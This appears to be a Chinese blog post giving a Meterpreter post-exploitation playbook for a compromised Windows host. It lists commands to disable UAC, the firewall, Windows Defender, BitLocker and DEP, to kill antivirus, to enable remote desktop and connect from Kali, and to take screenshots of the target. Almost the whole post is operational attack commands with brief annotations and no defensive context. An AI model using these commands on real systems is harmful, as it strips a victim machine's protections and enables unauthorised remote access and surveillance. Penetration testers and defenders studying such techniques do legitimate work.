關(guān)閉防護(hù)機(jī)制、遠(yuǎn)程桌面、截圖

關(guān)閉UAC

meterpreter > shell

C:\Windows\system32>cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\system32>cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f

C:\Windows\system32>shutdown /r /t 0? 有時可能需要重啟才能生效

C:\Windows\system32>netsh advfirewall set allprofiles state off ?關(guān)閉防火墻

C:\Windows\system32>net stop windefend? 關(guān)閉Windows Defender服務(wù)

C:\Windows\system32>manage-bde -status C:? 查看C盤Bitlocker狀態(tài)

C:\Windows\system32>manage-bde -off C: ?關(guān)閉Bitlocker磁盤加密

C:\Windows\system32>bcdedit.exe /set {current} nx AlwaysOff ?關(guān)閉DEP

meterpreter > run post/windows/manage/killav ?關(guān)閉殺毒軟件

遠(yuǎn)程桌面

meterpreter > run post/windows/manage/enable_rdp ?開啟遠(yuǎn)程桌面

root@kali:~# rdesktop 192.168.80.33 ?在Kali上連接目標(biāo)主機(jī)

meterpreter > run multi_console_command -r /root/.msf4/loot/20170407110920_default_192.168.80.33_host.windows.cle_874214.txt ?關(guān)閉遠(yuǎn)程桌面

meterpreter > screenshot ?截圖目標(biāo)主機(jī)

meterpreter > load espia

meterpreter > screengrab ?截圖目標(biāo)主機(jī)

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時請結(jié)合常識與多方信息審慎甄別。
平臺聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡書系信息發(fā)布平臺,僅提供信息存儲服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

  • 這篇文章幾乎幾乎原封不動的搬過來了這位博主的內(nèi)容,作為自己以后查詢方便用~ reference:http://bl...
    DeamoV閱讀 20,834評論 3 33
  • dos 批處理 一:windows的命令行模式(win+R)在里面寫CMD就可以進(jìn)入windows的命令行模式了二...
    chenchao981閱讀 844評論 0 6
  • 一.清理垃圾 在Windows在安裝和使用過程中都會產(chǎn)生相當(dāng)多的垃圾文件,包括臨時文件(如:*.tmp、*._mp...
    灰斗兒閱讀 857評論 3 16
  • 女兒期終考試后的一個周六,我和女兒在家,無事。 我在看書,女兒在玩開心網(wǎng)。 這時,女兒的同學(xué)打電話來邀請女兒去她家...
    疏食遨游客閱讀 708評論 0 0
  • 我家先生是個老實(shí)人,木的很,我每次心情不好他都不明白為什么,然后就在我面前表現(xiàn)的很委屈,我只想說,老娘心里委屈,你...
    紫曉阿嬌閱讀 192評論 0 1

友情鏈接更多精彩內(nèi)容